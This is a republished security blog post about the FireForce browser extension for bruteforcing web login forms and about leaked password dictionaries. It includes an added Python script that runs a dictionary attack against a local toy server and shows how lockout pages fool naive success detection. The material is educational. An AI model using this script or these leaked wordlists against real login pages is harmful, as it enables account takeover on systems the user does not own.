
Web Form Password Bruteforce Attacks Made Easy

Passwords suck. We all know it, but unless you can afford to provide multi-factor authentication to all of your users, Web site users, and business partners, you're stuck with them.

Implementing technical controls to enforce strong password creation by your users is a necessity because users will pick weak passwords when given the opportunity. Sure, there are some exceptions to the rule, but those aren’t the ones we’re worried about as security professionals. We are worried about the ones that are easy to crack.

Back in March, Ron Bowes posted a great blog titled "Hard Evidence that People Suck at Passwords" on skullsecurity.org. Ron takes a look at passwords that were leaked by attackers who breached sites like phpBB, Faithwriters, and Elite Hackers, and he provides some interesting insight into the password choices users make.

Also, it’s worth noting that Ron is currently hosting password dictionaries that come from various sources like password cracking tools and leaked password lists from compromised Web sites. They are very useful with the tool I’m about to talk about.

In a discussion about password bruteforcing on the Metasploit Framework mailing list, someone pointed out a Firefox extension that enables bruteforce password attacks against Web forms from right within the browser. It's called FireForce and is available here.

What a simple but useful and powerful tool! Typically, we refrain from password attacks because of account lockout issues, but we sometimes encounter Web apps with a local user authentication source that has no lockout feature at all. FireForce is simple in its implementation, but powerful enough to bruteforce just passwords or both usernames and passwords.

Teamed up with the passwords hosted at SkullSecurity, FireForce is nearly unstoppable, but it's not a replacement for Medusa. Be sure to read the documentation for info on running separate Firefox instances and on configuring username and password bruteforcing properly, as the dictionary selection is a little backwards.
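To make concrete what a tool like FireForce automates, here is an added example that is not from the original post or from the FireForce project: a small dictionary attack against an HTML login form, run against a throwaway local HTTP server so it works offline. Everything about the target is constructed (a hypothetical account `jsmith` with password `letmein`, the form field names `username`/`password`, and the tiny wordlists). The attack detects success the way a browser-based tool typically does, by noticing that the response differs from a known-bad baseline, and the server has an optional lockout switch so you can see the caveat that matters in practice: a lockout page also differs from the baseline, so the naive heuristic reports a false hit unless you also check for a real success marker.

```python
"""Added example: dictionary attack on a web login form (constructed target)."""
import itertools
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target: one hypothetical account, no rate limiting.
TARGET_USER = "jsmith"
TARGET_PASS = "letmein"
FAIL_BODY = b"<html><body>Invalid username or password</body></html>"
OK_BODY = b"<html><body>Welcome back, jsmith</body></html>"
LOCKED_BODY = b"<html><body>Account locked. Contact the help desk.</body></html>"


class LoginHandler(BaseHTTPRequestHandler):
    """Toy login form. lockout_after=None models an app with no lockout."""
    lockout_after = None
    failures = {}  # username -> consecutive failed attempts

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        cls = type(self)
        if cls.lockout_after and cls.failures.get(user, 0) >= cls.lockout_after:
            body = LOCKED_BODY
        elif (user, pw) == (TARGET_USER, TARGET_PASS):
            body = OK_BODY
        else:
            cls.failures[user] = cls.failures.get(user, 0) + 1
            body = FAIL_BODY
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server(lockout_after=None):
    """Start the toy target on a random loopback port and return the server."""
    LoginHandler.lockout_after = lockout_after
    LoginHandler.failures = {}
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_login(url, user, pw):
    """POST one credential pair to the form and return the response body."""
    data = urllib.parse.urlencode({"username": user, "password": pw}).encode()
    with urllib.request.urlopen(url, data=data, timeout=5) as resp:
        return resp.read()


def bruteforce(url, users, passwords, success_marker=None):
    """Try every user/password pair in order.

    Without success_marker, a hit is any response that differs from the
    baseline failure page (the usual browser-tool heuristic). With a marker,
    a hit must contain that byte string, which is what stops a lockout page
    from being mistaken for a successful login.
    Returns (user, password, attempts) or (None, None, attempts).
    """
    baseline = try_login(url, "no-such-user-xyz", "no-such-pass-xyz")
    attempts = 0
    for user, pw in itertools.product(users, passwords):
        attempts += 1
        body = try_login(url, user, pw)
        hit = success_marker in body if success_marker else body != baseline
        if hit:
            return user, pw, attempts
    return None, None, attempts


# Constructed wordlists; real runs would use the SkullSecurity dictionaries.
USERS = ["admin", "jsmith"]
PASSWORDS = ["password", "123456", "letmein", "qwerty"]

if __name__ == "__main__":
    srv = start_server()
    url = f"http://127.0.0.1:{srv.server_port}/login"
    print("no lockout:", bruteforce(url, USERS, PASSWORDS))
    srv.shutdown()
    srv = start_server(lockout_after=3)
    url = f"http://127.0.0.1:{srv.server_port}/login"
    print("lockout, naive diff:", bruteforce(url, USERS, PASSWORDS))
    print("lockout, marker:", bruteforce(url, USERS, PASSWORDS, b"Welcome"))
    srv.shutdown()
```

Against the no-lockout server the diff heuristic finds `jsmith:letmein` on the seventh attempt. With lockout after three failures, the same heuristic reports `admin:qwerty` on the fourth attempt because the lockout page is "different from the baseline"; only by checking for the success marker does the attack skip the locked account and still land on `jsmith:letmein`. That is exactly the situation to watch for when you let a browser extension decide what counts as a successful login.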

John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John’s not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.

Go here to see the original:
Web Form Password Bruteforce Attacks Made Easy


